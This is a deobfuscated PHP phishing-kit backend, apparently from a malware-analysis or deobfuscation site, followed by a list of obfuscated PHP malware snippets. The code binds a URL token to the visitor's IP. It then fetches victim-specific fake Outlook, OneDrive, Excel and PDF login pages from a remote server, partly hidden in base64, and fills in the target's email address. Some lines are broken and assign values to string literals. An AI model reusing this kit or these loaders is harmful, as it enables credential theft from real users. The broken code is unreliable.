		}
		 
	}
		 else {
		 $data = explode("?", $_SERVER["REQUEST_URI"])[1];
		 $data2 = explode("?", $_SERVER["REQUEST_URI"])[0];
		 
	}
		 function decode($data) {
		 $myArray = explode("&", base64_decode($data));
		 $data_out = array();
			 foreach ($myArray as $x) {
				 if (strpos($x, "sv") !== FALSE) {
				 $data_out["sv"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "uid") !== FALSE) {
				 $data_out["uid"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "rbox") !== FALSE) {
				 $data_out["rbox"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "ipdata") !== FALSE) {
				 $data_out["ipdata"] = explode("=", $x)[1];
				 
			}
				 if (strpos($x, "vbox") !== FALSE) {
				 $data_out["vbox"] = explode("=", $x)[1];
				 $vbox = explode("=", $x)[1];
				 
			}
			 
		}
		 return $data_out;
		 
	}
	 $_toprofile = decode($data);
		 if ($_toprofile["ipdata"]) {
			 if ($_toprofile["ipdata"] != $ip) {
			 header("Location: /4");
			 die;
			 
		}
		 
	}
		 else {
		 $linkinfo = "ipdata=" . $ip . "&" . base64_decode($data);
		 header("Location: " . $data2 . "?" . base64_encode($linkinfo) . "#" . base64_encode($vbox));
		 
	}
		 function profile($data, $vbox, $url, "TYPEXXX", $urldon, $XXXAPIXXX) {
			 if (strpos($data["sv"], "owa") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=owa";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#500-NULL");
				 die;
				 
			}
			 "TYPEXXX" = str_replace("TYPEXXX", $jscodeblock, "TYPEXXX");
			 
		}
			 if (strpos($data["sv"], "we") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=we";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 "TYPEXXX" = str_replace("TYPEXXX", $jscodeblock, "TYPEXXX");
			 
		}
			 if (strpos($data["sv"], "onedrive") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=onedrive";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 "TYPEXXX" = str_replace("TYPEXXX", $jscodeblock, "TYPEXXX");
			 
		}
			 if (strpos($data["sv"], "excel") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=excel";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 "TYPEXXX" = str_replace("TYPEXXX", $jscodeblock, "TYPEXXX");
			 
		}
			 if (strpos($data["sv"], "general") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=general";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /#0-NULL");
				 die;
				 
			}
			 "TYPEXXX" = str_replace("TYPEXXX", $jscodeblock, "TYPEXXX");
			 
		}
			 if (strpos($data["sv"], "pdf") !== FALSE) {
			 $todolink = $urldon . "/user.php?uid=" . $data["uid"] . "&genp=pdf";
			 $curl = curl_init();
			 curl_setopt_array($curl, array(CURLOPT_URL => $todolink, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_CUSTOMREQUEST => "GET"));
			 $jscodeblock = curl_exec($curl);
			 $err = curl_error($curl);
			 curl_close($curl);
				 if ($jscodeblock === "INVALID") {
				 header("Location: /-NULL");
				 die;
				 
			}
			 "TYPEXXX" = str_replace("TYPEXXX", $jscodeblock, "TYPEXXX");
			 
		}
		 "TYPEXXX" = str_replace("EMAILXXX", $data["vbox"], "TYPEXXX");
			 if ("TYPEXXX" === "TYPEXXX") {
			 header("Location: /#500-NULL");
			 die;
			 
		}
			 else {
			 print "TYPEXXX";
			 
		}
		 
	}
	 profile($_toprofile, $vbox, $url, "TYPEXXX", $urldon, $XXXAPIXXX);
	 
}
 goto YQqzi;
 vdipK: $urldon .= "aHR0cHM6Ly9vdGhlcnNlc3Npb24ybWFpb" . $mcbhei;
 goto TmcIb;
 YQqzi:

Recent submissions:

goto lxC33; DTjt1: $batt = "\156\116\154\143"; goto dOXvC; qH3AT: $urldon = ''; goto jATll... <?PHP /*1 s6yH-U"qjc*/ /*E_waqG`'Ag%g>*/PARSE_STR#%L<?5GlU3aS^C+a$PS)1D ( #SHus[TYX;V... <?=//8j"n$ye\Xhk^H-+5N_ (#,HusK15@|,Ph!#U'NEWn,|ur[9Kbu..e6d, @#$v&brvu=zS*e!n0kb,Xi?\Cu... <?PHP /*1 s6yH-U"qjc*/ /*E_waqG`'Ag%g>*/PARSE_STR#%L<?5GlU3aS^C+a$PS)1D ( #SHus[TYX;V... <?php @session_start();function login() { @session_start(); $UA = $_SERVER['HT... <?php ################################################################################ ... <?php eval(gzinflate(base64_decode("eJztPNty20h27/qKHg7HILMkRVKiLJEiKY8tj13ri2LJSaY0Li5ENE... <?php //004fb if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname()... <?php eval(base64_decode('CiBnb3RvIEZaMDB3OyB1TU5HYzogJHVzZXJuYW1lID0gIlwxNDFceDY0XHg2ZFwx... <?php eval( strrev( base64_decode( strrev( implode( [ '==AP/AH', 'awpQ', 'CpZGKk8', ...